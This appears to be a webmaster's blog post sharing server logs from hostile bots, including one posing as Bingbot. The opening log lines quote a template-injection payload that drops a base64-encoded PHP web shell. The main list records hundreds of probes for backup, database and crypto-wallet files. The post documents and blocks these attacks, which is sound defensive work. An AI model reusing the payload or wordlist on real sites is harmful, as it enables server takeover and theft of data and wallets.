106.52.197.96 - - [15/Sep/2019:20:00:29 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:33 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:37 -0700] "POST //index.php?c=upload&f=save HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
 
106.52.197.96 - - [15/Sep/2019:20:00:41 -0700] "POST //index.php?g=Api&m=Plugin&a=fetch HTTP/1.1" 404 4696 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

142.252.249.27 is Scanning for Crypto Wallets and Backups

Found a log entry from 142.252.249.27 this morning:

142.252.249.27 - - [09/Sep/2019:07:59:18 -0700] "HEAD /backup.zip HTTP/1.1" 404 4128 "http://www.freefixer.com/backup.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

The bot running at 142.252.249.27 is scanning freefixer.com for backups, databases, data, code, bitcoin wallets, bitcoin cash wallets, litecoin wallets, dogecoin wallets, etc. It looks for various file formats such as .zip, .rar, .dat, .7z, .sql, .mdb, .mdf, .tgz, .tar and .sql. Here’s the complete lite of requests that 142.252.249.27 did:

 HEAD /backup.zip
 HEAD /backup.rar
 HEAD /backup.dat
 HEAD /backup.7z
 HEAD /backup.sql
 HEAD /backup.mdb
 HEAD /backup.mdf
 HEAD /backup.tgz
 HEAD /backup.tar.gz
 HEAD /db.zip
 HEAD /db.rar
 HEAD /db.dat
 HEAD /db.7z
 HEAD /db.sql
 HEAD /db.mdb
 HEAD /db.mdf
 HEAD /db.tgz
 HEAD /db.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /database.zip
 HEAD /database.rar
 HEAD /database.dat
 HEAD /database.7z
 HEAD /database.sql
 HEAD /database.mdb
 HEAD /database.mdf
 HEAD /database.tgz
 HEAD /database.tar.gz
 HEAD /data.zip
 HEAD /data.rar
 HEAD /data.dat
 HEAD /data.7z
 HEAD /data.sql
 HEAD /data.mdb
 HEAD /data.mdf
 HEAD /data.tgz
 HEAD /data.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /wwwroot.zip
 HEAD /wwwroot.rar
 HEAD /wwwroot.dat
 HEAD /wwwroot.7z
 HEAD /wwwroot.sql
 HEAD /wwwroot.mdb
 HEAD /wwwroot.mdf
 HEAD /wwwroot.tgz
 HEAD /wwwroot.tar.gz
 HEAD /www.zip
 HEAD /www.rar
 HEAD /www.dat
 HEAD /www.7z
 HEAD /www.sql
 HEAD /www.mdb
 HEAD /www.mdf
 HEAD /www.tgz
 HEAD /www.tar.gz
 HEAD /code.zip
 HEAD /code.rar
 HEAD /code.dat
 HEAD /code.7z
 HEAD /code.sql
 HEAD /code.mdb
 HEAD /code.mdf
 HEAD /code.tgz
 HEAD /code.tar.gz
 HEAD /test.zip
 HEAD /test.rar
 HEAD /test.dat
 HEAD /test.7z
 HEAD /test.sql
 HEAD /test.mdb
 HEAD /test.mdf
 HEAD /test.tgz
 HEAD /test.tar.gz
 HEAD /admin.zip
 HEAD /admin.rar
 HEAD /admin.dat
 HEAD /admin.7z
 HEAD /admin.sql
 HEAD /admin.mdb
 HEAD /admin.mdf
 HEAD /admin.tgz
 HEAD /admin.tar.gz
 HEAD /user.zip
 HEAD /user.rar
 HEAD /user.dat
 HEAD /user.7z
 HEAD /user.sql
 HEAD /user.mdb
 HEAD /user.mdf
 HEAD /user.tgz
 HEAD /user.tar.gz
 HEAD /sql.zip
 HEAD /sql.rar
 HEAD /sql.dat
 HEAD /sql.7z
 HEAD /sql.sql
 HEAD /sql.mdb
 HEAD /sql.mdf
 HEAD /sql.tgz
 HEAD /sql.tar.gz
 HEAD /wallet.zip
 HEAD /wallet.rar
 HEAD /wallet.dat
 HEAD /wallet.7z
 HEAD /wallet.sql
 HEAD /wallet.mdb
 HEAD /wallet.mdf
 HEAD /wallet.tgz
 HEAD /wallet.tar.gz
 HEAD /wallet.backup.zip
 HEAD /wallet.backup.rar
 HEAD /wallet.backup.dat
 HEAD /wallet.backup.7z
 HEAD /wallet.backup.sql
 HEAD /wallet.backup.mdb
 HEAD /wallet.backup.mdf
 HEAD /wallet.backup.tgz
 HEAD /wallet.backup.tar.gz
 HEAD /litecoin.zip
 HEAD /litecoin.rar
 HEAD /litecoin.dat
 HEAD /litecoin.7z
 HEAD /litecoin.sql
 HEAD /litecoin.mdb
 HEAD /litecoin.mdf
 HEAD /litecoin.tgz
 HEAD /litecoin.tar.gz
 HEAD /Litecoin.zip
 HEAD /Litecoin.rar
 HEAD /Litecoin.dat
 HEAD /Litecoin.7z
 HEAD /Litecoin.sql
 HEAD /Litecoin.mdb
 HEAD /Litecoin.mdf
 HEAD /Litecoin.tgz
 HEAD /Litecoin.tar.gz
 HEAD /Bitcoin.zip
 HEAD /Bitcoin.rar
 HEAD /Bitcoin.dat
 HEAD /Bitcoin.7z
 HEAD /Bitcoin.sql
 HEAD /Bitcoin.mdb
 HEAD /Bitcoin.mdf
 HEAD /Bitcoin.tgz
 HEAD /Bitcoin.tar.gz
 HEAD /bitcoin.zip
 HEAD /bitcoin.rar
 HEAD /bitcoin.dat
 HEAD /bitcoin.7z
 HEAD /bitcoin.sql
 HEAD /bitcoin.mdb
 HEAD /bitcoin.mdf
 HEAD /bitcoin.tgz
 HEAD /bitcoin.tar.gz
 HEAD /HShare.zip
 HEAD /HShare.rar
 HEAD /HShare.dat
 HEAD /HShare.7z
 HEAD /HShare.sql
 HEAD /HShare.mdb
 HEAD /HShare.mdf
 HEAD /HShare.tgz
 HEAD /HShare.tar.gz
 HEAD /btc.zip
 HEAD /btc.rar
 HEAD /btc.dat
 HEAD /btc.7z
 HEAD /btc.sql
 HEAD /btc.mdb
 HEAD /btc.mdf
 HEAD /btc.tgz
 HEAD /btc.tar.gz
 HEAD /bch.zip
 HEAD /bch.rar
 HEAD /bch.dat
 HEAD /bch.7z
 HEAD /bch.sql
 HEAD /bch.mdb
 HEAD /bch.mdf
 HEAD /bch.tgz
 HEAD /bch.tar.gz
 HEAD /btm.zip
 HEAD /btm.rar
 HEAD /btm.dat
 HEAD /btm.mdb
 HEAD /btm.mdf
 HEAD /btm.tgz
 HEAD /btm.tar.gz
 HEAD /bcd.zip
 HEAD /bcd.rar
 HEAD /bcd.dat
 HEAD /bcd.7z
 HEAD /bcd.sql
 HEAD /bcd.mdb
 HEAD /bcd.mdf
 HEAD /bcd.tgz
 HEAD /bcd.tar.gz
 HEAD /bcx.zip
 HEAD /bcx.rar
 HEAD /bcx.dat
 HEAD /bcx.7z
 HEAD /bcx.sql
 HEAD /bcx.mdb
 HEAD /bcx.mdf
 HEAD /bcx.tgz
 HEAD /bcx.tar.gz
 HEAD /qianbao.zip
 HEAD /qianbao.rar
 HEAD /qianbao.dat
 HEAD /qianbao.7z
 HEAD /qianbao.sql
 HEAD /qianbao.mdb
 HEAD /qianbao.mdf
 HEAD /qianbao.tgz
 HEAD /qianbao.tar.gz
 HEAD /doge.zip
 HEAD /doge.rar
 HEAD /doge.dat
 HEAD /doge.7z
 HEAD /doge.sql
 HEAD /doge.mdb
 HEAD /doge.mdf
 HEAD /doge.tgz
 HEAD /doge.tar.gz
 HEAD /dogecoin.zip
 HEAD /dogecoin.rar
 HEAD /dogecoin.dat
 HEAD /dogecoin.7z
 HEAD /dogecoin.sql
 HEAD /dogecoin.mdb
 HEAD /dogecoin.mdf
 HEAD /dogecoin.tgz
 HEAD /dogecoin.tar.gz
 HEAD /backup.zip
 HEAD /backup.rar
 HEAD /backup.dat
 HEAD /backup.7z
 HEAD /backup.sql
 HEAD /backup.mdb
 HEAD /backup.mdf
 HEAD /backup.tgz
 HEAD /backup.tar.gz
 HEAD /db.zip
 HEAD /db.rar
 HEAD /db.dat
 HEAD /db.7z
 HEAD /db.sql
 HEAD /db.mdb
 HEAD /db.mdf
 HEAD /db.tgz
 HEAD /db.tar.gz
 HEAD /data.zip
 HEAD /data.rar
 HEAD /data.dat
 HEAD /data.7z
 HEAD /data.sql
 HEAD /data.mdb
 HEAD /data.mdf
 HEAD /data.tgz
 HEAD /data.tar.gz
 HEAD /web.zip
 HEAD /web.rar
 HEAD /web.dat
 HEAD /web.7z
 HEAD /web.sql
 HEAD /web.mdb
 HEAD /web.mdf
 HEAD /web.tgz
 HEAD /web.tar.gz
 HEAD /wwwroot.zip
 HEAD /wwwroot.rar
 HEAD /wwwroot.dat
 HEAD /wwwroot.7z
 HEAD /wwwroot.sql
 HEAD /wwwroot.mdb
 HEAD /wwwroot.mdf
 HEAD /wwwroot.tgz
 HEAD /wwwroot.tar.gz
 HEAD /database.zip
 HEAD /database.rar
 HEAD /database.dat
 HEAD /database.7z
 HEAD /database.sql
 HEAD /database.mdb
 HEAD /database.mdf
 HEAD /database.tgz
 HEAD /database.tar.gz
 HEAD /www.zip
 HEAD /www.rar
 HEAD /www.dat
 HEAD /www.7z
 HEAD /www.sql
 HEAD /www.mdb
 HEAD /www.mdf
 HEAD /www.tgz
 HEAD /www.tar.gz
 HEAD /code.zip
 HEAD /code.rar
 HEAD /code.dat
 HEAD /code.7z
 HEAD /code.sql
 HEAD /code.mdb
 HEAD /code.mdf
 HEAD /code.tgz
 HEAD /code.tar.gz
 HEAD /test.zip
 HEAD /test.rar
 HEAD /test.dat
 HEAD /test.7z
 HEAD /test.sql
 HEAD /test.mdb
 HEAD /test.mdf
 HEAD /test.tgz
 HEAD /test.tar.gz
 HEAD /admin.zip
 HEAD /admin.rar
 HEAD /admin.dat
 HEAD /admin.7z
 HEAD /admin.sql
 HEAD /admin.mdb
 HEAD /admin.mdf
 HEAD /admin.tgz
 HEAD /admin.tar.gz
 HEAD /user.zip
 HEAD /user.rar
 HEAD /user.dat
 HEAD /user.7z
 HEAD /user.sql
 HEAD /user.mdb
 HEAD /user.mdf
 HEAD /user.tgz
 HEAD /user.tar.gz
 HEAD /sql.zip
 HEAD /sql.rar
 HEAD /sql.dat
 HEAD /sql.7z
 HEAD /sql.sql
 HEAD /sql.mdb
 HEAD /sql.mdf
 HEAD /sql.tgz
 HEAD /sql.tar.gz
 HEAD /bf.zip
 HEAD /bf.rar
 HEAD /bf.dat
 HEAD /bf.7z
 HEAD /bf.sql
 HEAD /bf.mdb
 HEAD /bf.mdf
 HEAD /bf.tgz
 HEAD /bf.tar.gz
 HEAD /beifen.zip
 HEAD /beifen.rar
 HEAD /beifen.dat
 HEAD /beifen.7z
 HEAD /beifen.sql
 HEAD /beifen.mdb
 HEAD /beifen.mdf
 HEAD /beifen.tgz
 HEAD /beifen.tar.gz
 HEAD /shujuku.zip
 HEAD /shujuku.rar
 HEAD /shujuku.dat
 HEAD /shujuku.7z
 HEAD /shujuku.sql
 HEAD /shujuku.mdb
 HEAD /shujuku.mdf
 HEAD /shujuku.tgz
 HEAD /shujuku.tar.gz
 HEAD /shuju.zip
 HEAD /shuju.rar
 HEAD /shuju.dat
 HEAD /shuju.7z
 HEAD /shuju.sql
 HEAD /shuju.mdb
 HEAD /shuju.mdf
 HEAD /shuju.tgz
 HEAD /shuju.tar.gz
 HEAD /ziliao.zip
 HEAD /ziliao.rar
 HEAD /ziliao.dat
 HEAD /ziliao.7z
 HEAD /ziliao.sql
 HEAD /ziliao.mdb
 HEAD /ziliao.mdf
 HEAD /ziliao.tgz
 HEAD /ziliao.tar.gz
 HEAD /freefixer.zip
 HEAD /freefixer.com.zip
 HEAD /www.freefixer.com.zip
 HEAD /freefixer.rar
 HEAD /freefixer.com.rar
 HEAD /www.freefixer.com.rar
 HEAD /freefixer.dat
 HEAD /freefixer.com.dat
 HEAD /www.freefixer.com.dat
 HEAD /freefixer.7z
 HEAD /freefixer.com.7z
 HEAD /www.freefixer.com.7z
 HEAD /freefixer.sql
 HEAD /freefixer.com.sql
 HEAD /www.freefixer.com.sql
 HEAD /freefixer.mdb
 HEAD /freefixer.com.mdb
 HEAD /www.freefixer.com.mdb
 HEAD /freefixer.mdf
 HEAD /freefixer.com.mdf
 HEAD /www.freefixer.com.mdf
 HEAD /freefixer.tgz
 HEAD /freefixer.com.tgz
 HEAD /www.freefixer.com.tgz
 HEAD /freefixer.tar.gz
 HEAD /freefixer.com.tar.gz
 HEAD /www.freefixer.com.tar.gz

Vanta Telecommunications Limited and egihosting.com are names that shows up then I did a lookup in ARIN register, as shown in the screenshot below. I’m assuming one of their customers have been hacked.

If you’ve been following this blog for the last week you know that I’ve been trying to weed out fake Bingbots, Yandexbots and Googlebots and other types of bad behaviour. Since 142.252.249.27 is currently trying to gain access to non-public information I’m going to block it in Apache’s .htaccess file.